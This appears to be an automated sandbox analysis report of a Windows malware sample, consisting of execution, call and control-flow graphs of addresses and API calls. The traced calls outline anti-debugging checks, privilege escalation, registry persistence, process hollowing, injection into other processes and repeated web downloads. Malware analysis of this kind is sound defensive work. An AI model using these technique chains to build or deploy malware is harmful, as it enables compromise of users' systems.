                                                                                                                                                                                                                        execution_graph 885 7ff785313418 946 7ff78531153c 885->946 890 7ff785313438 1180 7ff7853140b0 GetCurrentProcess OpenProcessToken 890->1180 891 7ff785313430 ExitProcess 895 7ff785313453 896 7ff7853134b7 895->896 897 7ff785313468 895->897 900 7ff785313508 896->900 901 7ff7853134cc 896->901 898 7ff7853141f0 3 API calls 897->898 899 7ff785313474 898->899 902 7ff78531347b 899->902 903 7ff78531348e ExitProcess 899->903 908 7ff78531351d 900->908 909 7ff78531355e 900->909 904 7ff7853141f0 3 API calls 901->904 905 7ff7853141f0 3 API calls 902->905 906 7ff7853134d8 904->906 907 7ff785313487 905->907 910 7ff7853134e7 906->910 911 7ff7853134df ExitProcess 906->911 907->903 912 7ff785313496 907->912 1195 7ff7853141f0 CreateMutexA 908->1195 1204 7ff785313a40 909->1204 914 7ff785313218 21 API calls 910->914 1214 7ff7853132a8 912->1214 919 7ff7853134ec 914->919 917 7ff78531349b 921 7ff7853134af ExitProcess 917->921 922 7ff7853134a2 Sleep 917->922 925 7ff785313500 ExitProcess 919->925 926 7ff7853134f3 Sleep 919->926 922->917 923 7ff785313538 1199 7ff785313218 923->1199 924 7ff785313530 ExitProcess 926->919 930 7ff7853135ca CreateThread CreateThread CreateThread WaitForMultipleObjects ExitProcess 931 7ff785313576 933 7ff7853141f0 3 API calls 931->933 932 7ff78531353d 934 7ff785313551 ExitProcess 932->934 935 7ff785313544 Sleep 932->935 936 7ff785313582 933->936 935->932 937 7ff785313589 936->937 938 7ff78531359c ExitProcess 936->938 939 7ff7853141f0 3 API calls 937->939 940 7ff785313595 939->940 940->938 941 7ff7853135a4 940->941 942 7ff7853132a8 44 API calls 941->942 943 7ff7853135a9 942->943 944 7ff7853135bd ExitProcess 943->944 945 7ff7853135b0 Sleep 943->945 945->943 1223 7ff78531149c LoadLibraryA GetProcAddress 946->1223 948 7ff7853115c8 1224 7ff78531149c LoadLibraryA GetProcAddress 948->1224 950 7ff7853115e2 1225 7ff7853114ec LoadLibraryA GetProcAddress 950->1225 952 7ff7853115fc 1226 7ff7853114ec LoadLibraryA GetProcAddress 952->1226 954 7ff785311616 1227 7ff7853114ec LoadLibraryA GetProcAddress 954->1227 956 7ff785311630 1228 7ff7853114ec LoadLibraryA GetProcAddress 956->1228 958 7ff78531164a 1229 7ff7853114ec LoadLibraryA GetProcAddress 958->1229 960 7ff785311664 1230 7ff7853114ec LoadLibraryA GetProcAddress 960->1230 962 7ff78531167e 1231 7ff7853114ec LoadLibraryA GetProcAddress 962->1231 964 7ff785311698 1232 7ff7853114ec LoadLibraryA GetProcAddress 964->1232 966 7ff7853116b2 1233 7ff7853114ec LoadLibraryA GetProcAddress 966->1233 968 7ff7853116cc 1234 7ff78531149c LoadLibraryA GetProcAddress 968->1234 970 7ff7853116e6 1235 7ff78531149c LoadLibraryA GetProcAddress 970->1235 972 7ff785311700 1236 7ff78531149c LoadLibraryA GetProcAddress 972->1236 974 7ff78531171a 1237 7ff78531149c LoadLibraryA GetProcAddress 974->1237 976 7ff785311734 1238 7ff7853114ec LoadLibraryA GetProcAddress 976->1238 978 7ff78531174e 1239 7ff7853114ec LoadLibraryA GetProcAddress 978->1239 980 7ff785311768 1240 7ff7853114ec LoadLibraryA GetProcAddress 980->1240 982 7ff785311782 1241 7ff7853114ec LoadLibraryA GetProcAddress 982->1241 984 7ff78531179c 1242 7ff7853114ec LoadLibraryA GetProcAddress 984->1242 986 7ff7853117b6 1243 7ff7853114ec LoadLibraryA GetProcAddress 986->1243 988 7ff7853117d0 1244 7ff7853114ec LoadLibraryA GetProcAddress 988->1244 990 7ff7853117ea 1245 7ff7853114ec LoadLibraryA GetProcAddress 990->1245 992 7ff785311804 1246 7ff7853114ec LoadLibraryA GetProcAddress 992->1246 994 7ff78531181e 1247 7ff7853114ec LoadLibraryA GetProcAddress 994->1247 996 7ff785311838 1248 7ff7853114ec LoadLibraryA GetProcAddress 996->1248 998 7ff785311852 1249 7ff7853114ec LoadLibraryA GetProcAddress 998->1249 1000 7ff78531186c 1250 7ff7853114ec LoadLibraryA GetProcAddress 1000->1250 1002 7ff785311886 1251 7ff7853114ec LoadLibraryA GetProcAddress 1002->1251 1004 7ff7853118a0 1252 7ff7853114ec LoadLibraryA GetProcAddress 1004->1252 1006 7ff7853118ba 1253 7ff7853114ec LoadLibraryA GetProcAddress 1006->1253 1008 7ff7853118d4 1254 7ff7853114ec LoadLibraryA GetProcAddress 1008->1254 1010 7ff7853118ee 1255 7ff7853114ec LoadLibraryA GetProcAddress 1010->1255 1012 7ff785311908 1256 7ff7853114ec LoadLibraryA GetProcAddress 1012->1256 1014 7ff785311922 1257 7ff7853114ec LoadLibraryA GetProcAddress 1014->1257 1016 7ff78531193c 1258 7ff7853114ec LoadLibraryA GetProcAddress 1016->1258 1018 7ff785311956 1259 7ff7853114ec LoadLibraryA GetProcAddress 1018->1259 1020 7ff785311970 1260 7ff7853114ec LoadLibraryA GetProcAddress 1020->1260 1022 7ff78531198a 1261 7ff7853114ec LoadLibraryA GetProcAddress 1022->1261 1024 7ff7853119a4 1262 7ff7853114ec LoadLibraryA GetProcAddress 1024->1262 1026 7ff7853119be 1263 7ff7853114ec LoadLibraryA GetProcAddress 1026->1263 1028 7ff7853119d8 1264 7ff7853114ec LoadLibraryA GetProcAddress 1028->1264 1030 7ff7853119f2 1265 7ff7853114ec LoadLibraryA GetProcAddress 1030->1265 1032 7ff785311a0c 1266 7ff7853114ec LoadLibraryA GetProcAddress 1032->1266 1034 7ff785311a26 1267 7ff7853114ec LoadLibraryA GetProcAddress 1034->1267 1036 7ff785311a40 1268 7ff7853114ec LoadLibraryA GetProcAddress 1036->1268 1038 7ff785311a5a 1269 7ff7853114ec LoadLibraryA GetProcAddress 1038->1269 1040 7ff785311a74 1270 7ff7853114ec LoadLibraryA GetProcAddress 1040->1270 1042 7ff785311a8e 1271 7ff7853114ec LoadLibraryA GetProcAddress 1042->1271 1044 7ff785311aa8 1272 7ff7853114ec LoadLibraryA GetProcAddress 1044->1272 1046 7ff785311ac2 1273 7ff7853114ec LoadLibraryA GetProcAddress 1046->1273 1048 7ff785311adc 1274 7ff7853114ec LoadLibraryA GetProcAddress 1048->1274 1050 7ff785311af6 1275 7ff7853114ec LoadLibraryA GetProcAddress 1050->1275 1052 7ff785311b10 1276 7ff7853114ec LoadLibraryA GetProcAddress 1052->1276 1054 7ff785311b2a 1277 7ff7853114ec LoadLibraryA GetProcAddress 1054->1277 1056 7ff785311b44 1278 7ff7853114ec LoadLibraryA GetProcAddress 1056->1278 1058 7ff785311b5e 1279 7ff7853114ec LoadLibraryA GetProcAddress 1058->1279 1060 7ff785311b78 1280 7ff7853114ec LoadLibraryA GetProcAddress 1060->1280 1062 7ff785311b92 1281 7ff7853114ec LoadLibraryA GetProcAddress 1062->1281 1064 7ff785311bac 1282 7ff7853114ec LoadLibraryA GetProcAddress 1064->1282 1066 7ff785311bc6 1283 7ff7853114ec LoadLibraryA GetProcAddress 1066->1283 1068 7ff785311be0 1284 7ff7853114ec LoadLibraryA GetProcAddress 1068->1284 1070 7ff785311bfa 1285 7ff7853114ec LoadLibraryA GetProcAddress 1070->1285 1072 7ff785311c14 1286 7ff7853114ec LoadLibraryA GetProcAddress 1072->1286 1074 7ff785311c2e 1287 7ff7853114ec LoadLibraryA GetProcAddress 1074->1287 1076 7ff785311c48 1288 7ff7853114ec LoadLibraryA GetProcAddress 1076->1288 1078 7ff785311c62 1289 7ff7853114ec LoadLibraryA GetProcAddress 1078->1289 1080 7ff785311c7c 1290 7ff7853114ec LoadLibraryA GetProcAddress 1080->1290 1082 7ff785311c96 1291 7ff7853114ec LoadLibraryA GetProcAddress 1082->1291 1084 7ff785311cb0 1292 7ff7853114ec LoadLibraryA GetProcAddress 1084->1292 1086 7ff785311cca 1293 7ff7853114ec LoadLibraryA GetProcAddress 1086->1293 1088 7ff785311ce4 1294 7ff7853114ec LoadLibraryA GetProcAddress 1088->1294 1090 7ff785311cfe 1295 7ff7853114ec LoadLibraryA GetProcAddress 1090->1295 1092 7ff785311d18 1296 7ff7853114ec LoadLibraryA GetProcAddress 1092->1296 1094 7ff785311d32 1297 7ff7853114ec LoadLibraryA GetProcAddress 1094->1297 1096 7ff785311d4c 1298 7ff7853114ec LoadLibraryA GetProcAddress 1096->1298 1098 7ff785311d66 1299 7ff7853114ec LoadLibraryA GetProcAddress 1098->1299 1100 7ff785311d80 1300 7ff7853114ec LoadLibraryA GetProcAddress 1100->1300 1102 7ff785311d9a 1301 7ff7853114ec LoadLibraryA GetProcAddress 1102->1301 1104 7ff785311db4 1302 7ff7853114ec LoadLibraryA GetProcAddress 1104->1302 1106 7ff785311dce 1303 7ff7853114ec LoadLibraryA GetProcAddress 1106->1303 1108 7ff785311de8 1304 7ff7853114ec LoadLibraryA GetProcAddress 1108->1304 1110 7ff785311e02 1305 7ff7853114ec LoadLibraryA GetProcAddress 1110->1305 1112 7ff785311e1c 1306 7ff7853114ec LoadLibraryA GetProcAddress 1112->1306 1114 7ff785311e36 1307 7ff7853114ec LoadLibraryA GetProcAddress 1114->1307 1116 7ff785311e50 1308 7ff7853114ec LoadLibraryA GetProcAddress 1116->1308 1118 7ff785311e6a 1309 7ff7853114ec LoadLibraryA GetProcAddress 1118->1309 1120 7ff785311e84 1310 7ff7853114ec LoadLibraryA GetProcAddress 1120->1310 1122 7ff785311e9e 1311 7ff7853114ec LoadLibraryA GetProcAddress 1122->1311 1124 7ff785311eb8 1312 7ff7853114ec LoadLibraryA GetProcAddress 1124->1312 1126 7ff785311ed2 1313 7ff7853114ec LoadLibraryA GetProcAddress 1126->1313 1128 7ff785311eec 1314 7ff7853114ec LoadLibraryA GetProcAddress 1128->1314 1130 7ff785311f06 1315 7ff7853114ec LoadLibraryA GetProcAddress 1130->1315 1132 7ff785311f20 1316 7ff7853114ec LoadLibraryA GetProcAddress 1132->1316 1134 7ff785311f3a 1317 7ff7853114ec LoadLibraryA GetProcAddress 1134->1317 1136 7ff785311f54 1318 7ff7853114ec LoadLibraryA GetProcAddress 1136->1318 1138 7ff785311f6e 1319 7ff7853114ec LoadLibraryA GetProcAddress 1138->1319 1140 7ff785311f88 1320 7ff7853114ec LoadLibraryA GetProcAddress 1140->1320 1142 7ff785311fa2 1321 7ff7853114ec LoadLibraryA GetProcAddress 1142->1321 1144 7ff785311fbc 1322 7ff78531149c LoadLibraryA GetProcAddress 1144->1322 1146 7ff785311fd6 1323 7ff7853114ec LoadLibraryA GetProcAddress 1146->1323 1148 7ff785311ff0 1324 7ff7853114ec LoadLibraryA GetProcAddress 1148->1324 1150 7ff78531200a 1325 7ff7853114ec LoadLibraryA GetProcAddress 1150->1325 1152 7ff785312024 1326 7ff7853114ec LoadLibraryA GetProcAddress 1152->1326 1154 7ff78531203e 1327 7ff7853114ec LoadLibraryA GetProcAddress 1154->1327 1156 7ff785312058 1328 7ff7853114ec LoadLibraryA GetProcAddress 1156->1328 1158 7ff785312072 1329 7ff7853114ec LoadLibraryA GetProcAddress 1158->1329 1160 7ff78531208c 1330 7ff78531149c LoadLibraryA GetProcAddress 1160->1330 1162 7ff7853120a6 1331 7ff78531149c LoadLibraryA GetProcAddress 1162->1331 1164 7ff7853120c0 1332 7ff7853114ec LoadLibraryA GetProcAddress 1164->1332 1166 7ff7853120da 1333 7ff7853114ec LoadLibraryA GetProcAddress 1166->1333 1168 7ff7853120f4 1334 7ff7853114ec LoadLibraryA GetProcAddress 1168->1334 1170 7ff78531210e 1335 7ff7853114ec LoadLibraryA GetProcAddress 1170->1335 1172 7ff785312128 1336 7ff7853114ec LoadLibraryA GetProcAddress 1172->1336 1174 7ff785312142 1337 7ff7853114ec LoadLibraryA GetProcAddress 1174->1337 1176 7ff78531215c 1177 7ff7853131b8 IsDebuggerPresent 1176->1177 1178 7ff7853131ca GetCurrentProcess CheckRemoteDebuggerPresent 1177->1178 1179 7ff7853131c6 1177->1179 1178->1179 1179->890 1179->891 1181 7ff78531343d 1180->1181 1182 7ff7853140d6 GetTokenInformation 1180->1182 1191 7ff785313cb0 GetModuleFileNameW 1181->1191 1338 7ff785313b20 VirtualAlloc 1182->1338 1184 7ff785314107 GetTokenInformation 1185 7ff78531414e AdjustTokenPrivileges CloseHandle 1184->1185 1186 7ff785314134 CloseHandle 1184->1186 1339 7ff785313af0 1185->1339 1187 7ff785313af0 VirtualFree 1186->1187 1188 7ff785314149 1187->1188 1188->1181 1192 7ff785313cdb PathFindFileNameW wcslen 1191->1192 1193 7ff785313d9e wcsncpy 1191->1193 1194 7ff785313d15 1192->1194 1193->1194 1194->895 1196 7ff785313529 1195->1196 1197 7ff78531421c GetLastError 1195->1197 1196->923 1196->924 1197->1196 1198 7ff785314229 CloseHandle 1197->1198 1198->1196 1342 7ff785313890 1199->1342 1201 7ff785313228 1345 7ff785314300 CreateFileW 1201->1345 1205 7ff785313710 3 API calls 1204->1205 1206 7ff785313a6b 1205->1206 1207 7ff785313890 11 API calls 1206->1207 1208 7ff785313a75 GetModuleFileNameW DeleteFileW CopyFileW 1207->1208 1209 7ff785313ab7 SetFileAttributesW 1208->1209 1210 7ff785313563 1208->1210 1362 7ff785313980 RegOpenKeyExW 1209->1362 1212 7ff7853133a8 GetVersionExW 1210->1212 1213 7ff7853133d9 1212->1213 1213->930 1213->931 1215 7ff785313890 11 API calls 1214->1215 1216 7ff7853132b9 1215->1216 1365 7ff785314530 CreateFileW 1216->1365 1218 7ff7853132d1 1219 7ff785313313 CreateThread 1218->1219 1377 7ff785314090 1218->1377 1219->917 1223->948 1224->950 1225->952 1226->954 1227->956 1228->958 1229->960 1230->962 1231->964 1232->966 1233->968 1234->970 1235->972 1236->974 1237->976 1238->978 1239->980 1240->982 1241->984 1242->986 1243->988 1244->990 1245->992 1246->994 1247->996 1248->998 1249->1000 1250->1002 1251->1004 1252->1006 1253->1008 1254->1010 1255->1012 1256->1014 1257->1016 1258->1018 1259->1020 1260->1022 1261->1024 1262->1026 1263->1028 1264->1030 1265->1032 1266->1034 1267->1036 1268->1038 1269->1040 1270->1042 1271->1044 1272->1046 1273->1048 1274->1050 1275->1052 1276->1054 1277->1056 1278->1058 1279->1060 1280->1062 1281->1064 1282->1066 1283->1068 1284->1070 1285->1072 1286->1074 1287->1076 1288->1078 1289->1080 1290->1082 1291->1084 1292->1086 1293->1088 1294->1090 1295->1092 1296->1094 1297->1096 1298->1098 1299->1100 1300->1102 1301->1104 1302->1106 1303->1108 1304->1110 1305->1112 1306->1114 1307->1116 1308->1118 1309->1120 1310->1122 1311->1124 1312->1126 1313->1128 1314->1130 1315->1132 1316->1134 1317->1136 1318->1138 1319->1140 1320->1142 1321->1144 1322->1146 1323->1148 1324->1150 1325->1152 1326->1154 1327->1156 1328->1158 1329->1160 1330->1162 1331->1164 1332->1166 1333->1168 1334->1170 1335->1172 1336->1174 1337->1176 1338->1184 1340 7ff785313b01 VirtualFree 1339->1340 1341 7ff785313b14 1339->1341 1340->1341 1341->1181 1351 7ff785313710 GetWindowsDirectoryW 1342->1351 1344 7ff7853138bf 8 API calls 1344->1201 1346 7ff785314377 GetLastError 1345->1346 1347 7ff785314356 1345->1347 1348 7ff78531323b CreateThread Sleep CreateThread 1346->1348 1356 7ff785314250 GetFileSize 1347->1356 1348->932 1352 7ff78531375a 1351->1352 1353 7ff785313764 GetVolumeInformationW 1351->1353 1352->1353 1355 7ff7853137e0 1353->1355 1354 7ff78531384a wsprintfW 1354->1344 1355->1354 1361 7ff785313b20 VirtualAlloc 1356->1361 1358 7ff78531427c 1359 7ff7853142c6 CloseHandle 1358->1359 1360 7ff785314290 SetFilePointer ReadFile 1358->1360 1359->1348 1360->1359 1361->1358 1363 7ff7853139c1 1362->1363 1364 7ff7853139c5 RegSetValueExW RegCloseKey 1362->1364 1363->1210 1364->1363 1366 7ff78531458a 1365->1366 1367 7ff785314591 GetFileSize GetProcessHeap RtlAllocateHeap 1365->1367 1366->1218 1368 7ff7853145da CloseHandle 1367->1368 1369 7ff7853145ec ReadFile 1367->1369 1368->1366 1370 7ff78531463b 1369->1370 1371 7ff785314613 GetProcessHeap HeapFree CloseHandle 1369->1371 1372 7ff785314654 GetProcessHeap HeapFree CloseHandle 1370->1372 1376 7ff78531467c 1370->1376 1371->1366 1372->1366 1373 7ff7853147e7 GetProcessHeap HeapFree CloseHandle 1373->1366 1374 7ff785314737 GetProcessHeap RtlAllocateHeap 1375 7ff785314780 1374->1375 1375->1373 1376->1373 1376->1374 1396 7ff785313fd0 CreateToolhelp32Snapshot 1377->1396 1380 7ff7853110d8 OpenProcess 1381 7ff78531111f 1380->1381 1383 7ff785311115 1380->1383 1403 7ff7853113c4 GetModuleHandleA GetProcAddress 1381->1403 1383->1219 1384 7ff78531112c 1384->1383 1385 7ff7853111fe VirtualAllocEx 1384->1385 1385->1383 1386 7ff78531124f WriteProcessMemory 1385->1386 1386->1383 1387 7ff785311286 WriteProcessMemory 1386->1387 1387->1383 1388 7ff7853112d1 1387->1388 1405 7ff785311444 GetSystemInfo 1388->1405 1391 7ff7853112fe GetModuleHandleA GetProcAddress 1391->1383 1393 7ff785311338 1391->1393 1392 7ff785311444 GetSystemInfo 1394 7ff7853112f4 1392->1394 1393->1383 1395 7ff785311399 CloseHandle 1393->1395 1394->1391 1394->1395 1395->1383 1397 7ff7853132fe 1396->1397 1398 7ff78531400b Process32FirstW 1396->1398 1397->1380 1399 7ff78531402a wcscmp 1398->1399 1400 7ff785314065 CloseHandle 1398->1400 1401 7ff78531404e Process32NextW 1399->1401 1402 7ff785314041 1399->1402 1400->1397 1401->1399 1401->1400 1402->1400 1404 7ff7853113ff 1403->1404 1404->1384 1406 7ff7853112ea 1405->1406 1406->1391 1406->1392 1427 7ff785313078 1432 7ff785313081 1427->1432 1428 7ff78531316d 1431 7ff785313bf0 RegDeleteKeyW 1431->1432 1432->1428 1432->1431 1433 7ff785313df0 9 API calls 1432->1433 1434 7ff785313980 3 API calls 1432->1434 1436 7ff785314410 CreateFileW 1432->1436 1441 7ff785313b50 RegOpenKeyExW 1432->1441 1433->1432 1435 7ff78531315d Sleep 1434->1435 1435->1432 1437 7ff78531446b 1436->1437 1438 7ff7853144a6 1436->1438 1444 7ff785314390 SetFilePointer WriteFile SetEndOfFile 1437->1444 1438->1432 1440 7ff785314487 SetFileAttributesW CloseHandle 1440->1438 1442 7ff785313bde 1441->1442 1443 7ff785313ba4 RegSetValueExW RegCloseKey 1441->1443 1442->1432 1443->1442 1444->1440 1469 7ff785312f38 1470 7ff785313890 11 API calls 1469->1470 1471 7ff785312f77 1470->1471 1472 7ff785314530 17 API calls 1471->1472 1473 7ff785312f9b 1472->1473 1474 7ff785314090 5 API calls 1473->1474 1475 7ff785312fbe 1474->1475 1476 7ff7853110d8 10 API calls 1475->1476 1477 7ff785312fd3 GetProcessHeap HeapFree 1476->1477 833 7ff785313368 836 7ff7853124d8 GetModuleFileNameW 833->836 837 7ff785312559 836->837 846 7ff785312554 836->846 838 7ff785312597 837->838 839 7ff7853125ad 837->839 840 7ff7853125cb 838->840 843 7ff7853125a1 838->843 879 7ff785312418 ExpandEnvironmentStringsW 839->879 880 7ff785312458 ExpandEnvironmentStringsW 840->880 843->846 881 7ff785312498 ExpandEnvironmentStringsW 843->881 844 7ff7853125c2 844->846 847 7ff78531261d CreateProcessW 844->847 847->846 848 7ff785312678 CreateFileW 847->848 848->846 849 7ff7853126bf GetFileSize 848->849 850 7ff7853126e7 CloseHandle 849->850 851 7ff7853126dd 849->851 850->846 851->850 852 7ff7853126f7 VirtualAlloc 851->852 853 7ff785312731 ReadFile 852->853 854 7ff785312721 CloseHandle 852->854 855 7ff78531275e VirtualFree CloseHandle 853->855 856 7ff785312781 CloseHandle GetThreadContext 853->856 854->846 855->846 857 7ff7853127e9 ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 856->857 858 7ff7853127d1 VirtualFree 856->858 859 7ff785312888 VirtualAllocEx 857->859 860 7ff785312870 VirtualFree 857->860 858->846 861 7ff78531290b WriteProcessMemory 859->861 862 7ff7853128f3 VirtualFree 859->862 860->846 863 7ff785312941 VirtualFree 861->863 866 7ff785312959 861->866 862->846 863->846 864 7ff78531298f WriteProcessMemory 865 7ff785312a1a VirtualFree 864->865 864->866 865->846 866->864 871 7ff785312a37 866->871 867 7ff785312d28 WriteProcessMemory SetThreadContext 869 7ff785312dae VirtualFree 867->869 870 7ff785312dc3 ResumeThread 867->870 868 7ff785312aa9 RtlCompareMemory 868->871 875 7ff785312afc 868->875 869->846 872 7ff785312dea VirtualFree 870->872 873 7ff785312dd5 VirtualFree 870->873 871->867 871->868 872->846 873->846 874 7ff785312d23 874->867 875->874 876 7ff785312c2c ReadProcessMemory WriteProcessMemory 875->876 877 7ff785312d19 876->877 878 7ff785312d01 VirtualFree 876->878 877->875 878->846 879->844 880->844 881->844 1407 7ff785313348 1408 7ff7853124d8 37 API calls 1407->1408 1409 7ff785313358 1408->1409 1445 7ff785313188 1446 7ff785313191 1445->1446 1447 7ff7853131aa 1446->1447 1450 7ff785313008 1446->1450 1455 7ff785312e08 CreateMutexA 1450->1455 1453 7ff785313068 Sleep 1453->1446 1454 7ff785313023 Sleep CreateThread WaitForSingleObject 1454->1453 1456 7ff785312e51 GetLastError 1455->1456 1457 7ff785312e34 ReleaseMutex CloseHandle 1455->1457 1459 7ff785312e7b ReleaseMutex CloseHandle 1456->1459 1460 7ff785312e5e ReleaseMutex CloseHandle 1456->1460 1458 7ff785312e93 1457->1458 1458->1453 1458->1454 1459->1458 1460->1458 1461 7ff785311088 GetModuleHandleA GetProcAddress 1462 7ff7853110bb 1461->1462 1463 7ff785312ea8 CreateMutexA 1464 7ff785312eea GetLastError 1463->1464 1465 7ff785312ecd ReleaseMutex CloseHandle 1463->1465 1467 7ff785312ef7 ReleaseMutex CloseHandle 1464->1467 1468 7ff785312f14 ReleaseMutex CloseHandle 1464->1468 1466 7ff785312f2c 1465->1466 1467->1466 1468->1466 1410 7ff78531216c 1411 7ff785312196 InternetOpenW 1410->1411 1412 7ff7853121d0 InternetOpenUrlW 1411->1412 1413 7ff7853121c3 Sleep 1411->1413 1414 7ff785312207 InternetOpenUrlW 1412->1414 1415 7ff785312259 HttpQueryInfoA 1412->1415 1413->1411 1414->1415 1416 7ff78531223e InternetCloseHandle Sleep 1414->1416 1417 7ff785312288 InternetCloseHandle InternetCloseHandle Sleep 1415->1417 1418 7ff7853122ae 1415->1418 1416->1411 1417->1411 1419 7ff7853122b8 InternetCloseHandle InternetOpenUrlW 1418->1419 1420 7ff785312315 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1418->1420 1419->1420 1421 7ff7853122fa InternetCloseHandle Sleep 1419->1421 1422 7ff78531237a InternetCloseHandle InternetCloseHandle 1420->1422 1423 7ff785312394 1420->1423 1421->1411 1424 7ff785312413 1422->1424 1425 7ff78531239c InternetReadFile 1423->1425 1426 7ff7853123ea InternetCloseHandle InternetCloseHandle 1423->1426 1425->1423 1425->1426 1426->1424

                                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                                        callgraph 0 Function_00007FF785312458 1 Function_00007FF78531FE5A 2 Function_00007FF78531D65A 3 Function_00007FF78531B05A 4 Function_00007FF785313559 5 Function_00007FF78531B061 6 Function_00007FF78531E668 7 Function_00007FF785313368 52 Function_00007FF7853124D8 7->52 8 Function_00007FF78531216C 9 Function_00007FF78531B26F 10 Function_00007FF78531EA72 11 Function_00007FF78531B772 12 Function_00007FF78531EC71 13 Function_00007FF78531B776 14 Function_00007FF78531B778 15 Function_00007FF785313078 19 Function_00007FF785313980 15->19 47 Function_00007FF785313B50 15->47 66 Function_00007FF785313BF0 15->66 67 Function_00007FF785313DF0 15->67 83 Function_00007FF785314410 15->83 16 Function_00007FF78531E079 17 Function_00007FF78531147F 18 Function_00007FF78531E07F 20 Function_00007FF785313188 79 Function_00007FF785313008 20->79 21 Function_00007FF785311088 22 Function_00007FF785313388 22->52 23 Function_00007FF78531E289 24 Function_00007FF785314390 25 Function_00007FF785314090 111 Function_00007FF785313FD0 25->111 26 Function_00007FF785313890 82 Function_00007FF785313710 26->82 27 Function_00007FF78531DA94 28 Function_00007FF785312418 29 Function_00007FF785313218 29->26 75 Function_00007FF785314300 29->75 30 Function_00007FF785313418 30->29 37 Function_00007FF78531153C 30->37 38 Function_00007FF785313A40 30->38 55 Function_00007FF785313EE0 30->55 65 Function_00007FF7853141F0 30->65 91 Function_00007FF7853133A8 30->91 92 Function_00007FF7853132A8 30->92 98 Function_00007FF7853140B0 30->98 99 Function_00007FF785313CB0 30->99 102 Function_00007FF7853131B8 30->102 31 Function_00007FF78531EC20 32 Function_00007FF785313B20 33 Function_00007FF785313C30 34 Function_00007FF785314530 105 Function_00007FF7853144C0 34->105 35 Function_00007FF785312F38 35->25 35->26 35->33 35->34 53 Function_00007FF7853110D8 35->53 36 Function_00007FF78531DC37 63 Function_00007FF7853114EC 37->63 85 Function_00007FF78531149C 37->85 38->19 38->26 38->82 39 Function_00007FF785311444 40 Function_00007FF78531B248 41 Function_00007FF785313348 41->52 42 Function_00007FF78531F747 43 Function_00007FF78531F749 44 Function_00007FF78531F74B 45 Function_00007FF78531B04E 46 Function_00007FF785314250 46->32 48 Function_00007FF78531C14F 49 Function_00007FF78531B052 50 Function_00007FF78531B152 51 Function_00007FF78531B0D8 52->0 52->28 84 Function_00007FF785312498 52->84 53->39 74 Function_00007FF785311000 53->74 106 Function_00007FF7853113C4 53->106 54 Function_00007FF7853201DA 56 Function_00007FF7853136E0 57 Function_00007FF78531CCE1 58 Function_00007FF78531C2E4 59 Function_00007FF78531D2E3 60 Function_00007FF78531F7E6 61 Function_00007FF78531D2E5 62 Function_00007FF78531D2E7 64 Function_00007FF785313AF0 68 Function_00007FF78531BBF2 69 Function_00007FF78531E9F6 70 Function_00007FF78531C4F8 71 Function_00007FF78531BBF7 72 Function_00007FF78531BBF9 73 Function_00007FF78531BBFB 75->46 76 Function_00007FF78531DE04 77 Function_00007FF78531EA05 78 Function_00007FF785312E08 79->78 80 Function_00007FF78531EC09 81 Function_00007FF78531D70B 82->56 83->24 86 Function_00007FF78531CE9D 87 Function_00007FF7853201A2 88 Function_00007FF78531E0A1 89 Function_00007FF78531F6A3 90 Function_00007FF78531E0A5 92->25 92->26 92->33 92->34 92->53 93 Function_00007FF785312EA8 94 Function_00007FF7853136AA 95 Function_00007FF78531FEA9 96 Function_00007FF78531E4AB 97 Function_00007FF7853200B0 98->32 98->64 100 Function_00007FF78531E6B4 101 Function_00007FF78531EDB8 103 Function_00007FF7853136B8 104 Function_00007FF78531B2C0 107 Function_00007FF7853135C5 108 Function_00007FF78531E6C5 109 Function_00007FF7853136C8 110 Function_00007FF78531E6CD

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 00007FF7853124D8 Relevance: 66.9, APIs: 34, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 231 7ff7853124d8-7ff785312552 GetModuleFileNameW 232 7ff785312559-7ff785312595 231->232 233 7ff785312554 231->233 235 7ff785312597-7ff78531259f 232->235 236 7ff7853125ad-7ff7853125c9 call 7ff785312418 232->236 234 7ff785312dfd-7ff785312e05 233->234 237 7ff7853125cb-7ff7853125e7 call 7ff785312458 235->237 238 7ff7853125a1-7ff7853125a9 235->238 244 7ff78531260c-7ff785312616 236->244 237->244 242 7ff7853125e9-7ff785312605 call 7ff785312498 238->242 243 7ff7853125ab-7ff785312607 238->243 242->244 243->234 249 7ff785312618 244->249 250 7ff78531261d-7ff785312671 CreateProcessW 244->250 249->234 251 7ff785312678-7ff7853126b8 CreateFileW 250->251 252 7ff785312673 250->252 253 7ff7853126ba 251->253 254 7ff7853126bf-7ff7853126db GetFileSize 251->254 252->234 253->234 255 7ff7853126e7-7ff7853126f2 CloseHandle 254->255 256 7ff7853126dd-7ff7853126e5 254->256 255->234 256->255 257 7ff7853126f7-7ff78531271f VirtualAlloc 256->257 258 7ff785312731-7ff78531275c ReadFile 257->258 259 7ff785312721-7ff78531272c CloseHandle 257->259 260 7ff78531275e-7ff78531277c VirtualFree CloseHandle 258->260 261 7ff785312781-7ff7853127cf CloseHandle GetThreadContext 258->261 259->234 260->234 262 7ff7853127e9-7ff78531286e ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 261->262 263 7ff7853127d1-7ff7853127e4 VirtualFree 261->263 264 7ff785312888-7ff7853128f1 VirtualAllocEx 262->264 265 7ff785312870-7ff785312883 VirtualFree 262->265 263->234 266 7ff78531290b-7ff78531293f WriteProcessMemory 264->266 267 7ff7853128f3-7ff785312906 VirtualFree 264->267 265->234 268 7ff785312959-7ff785312964 266->268 269 7ff785312941-7ff785312954 VirtualFree 266->269 267->234 270 7ff785312976-7ff785312989 268->270 269->234 271 7ff785312a37-7ff785312a7e 270->271 272 7ff78531298f-7ff785312a18 WriteProcessMemory 270->272 275 7ff785312a90-7ff785312aa3 271->275 273 7ff785312a1a-7ff785312a2d VirtualFree 272->273 274 7ff785312a32 272->274 273->234 274->270 277 7ff785312d28-7ff785312dac WriteProcessMemory SetThreadContext 275->277 278 7ff785312aa9-7ff785312af8 RtlCompareMemory 275->278 279 7ff785312dae-7ff785312dc1 VirtualFree 277->279 280 7ff785312dc3-7ff785312dd3 ResumeThread 277->280 281 